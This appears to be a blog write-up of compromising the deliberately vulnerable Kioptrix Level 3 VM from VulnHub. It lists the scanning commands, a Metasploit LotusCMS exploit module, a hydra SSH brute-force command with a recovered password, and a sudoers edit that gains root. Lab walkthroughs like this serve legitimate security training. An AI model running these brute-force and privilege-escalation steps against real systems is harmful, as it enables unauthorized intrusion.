So going back to poping these vulnerable VMs onto Kioptirx level 3
Name: Kioptrix: Level 1.2 (#3)
Date release: 18 Apr 2011
Author: Kioptrix
Series: Kioptrix
Web page: http://www.kioptrix.com/blog/?p=358
Vulnhub: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
🔥HOST DISCOVERY🔥
ARP
arp-scan -l
ping
ping 192.168.0.20
The box is up and responding
🔥PORT SCANNING🔥
TCP
nmap -sS -A -sC -sV -O -p0- 192.168.0.20 -oA nmap_tcp_full_ver_sV
UDP
nmap -sU -n 192.168.0.20 -oA nmap_udp_def
hmmm nothing for UDP then
🔥SERVICE ENUMERATION 🔥
22 - ssh
ssh 192.168.0.20
80 - http
Has a login page
http://192.168.0.20/index.php?system=Admin
we enumerate the platform LotusCMS
nikto -h 192.168.0.20
A few more bits found with nikto
http://192.168.0.20/phpmyadmin/
phpmyadmin - 2.11.3.0
🔥EXPLOITATION🔥
Looking through metasploit we find a likely exploit
exploit/multi/http/lcms_php_exec
Execution of the exploit gives us a shell with www-data permissions
🔥PRIV ESCULATION🔥
Looking around the file system
I found the user loneferret so decided to try bruteforce SSH using hydra. More on this later
Gconfig.php has mysql creds stored in clear-text which will be useful..
Checking back on my bruteforcing a little later we have a hit
hydra -e nsr -l loneferret -P /usr/share/wordlists/rockyou.txt ssh -t 4
Now SSH'd in as loneferret:starwars
sudo ht
gives us an error but using google fu we find a quickfix
https://stackoverflow.com/questions/6804208/nano-error-error-opening-terminal-xterm-256color
Once we get it working we are faced with this screen.
After fighting with the gui and figuring out how to use this I open /etc/sudoers using alt+f
I added , /bin/sh
to the end so we can bump to root.
Try again
got root 😎😎😎
Please follow me @shifty0g
Great write up! Voted and followed!
If you have not seen it yet, check out vulnhub.com for more vulnerable-by-design challenges.
Thank you for the upvote :)
Congratulations @shifty0g! You have completed some achievement on Steemit and have been rewarded with new badge(s) :
Award for the number of upvotes
Click on any badge to view your own Board of Honor on SteemitBoard.
For more information about SteemitBoard, click here
If you no longer want to receive notifications, reply to this comment with the word
STOP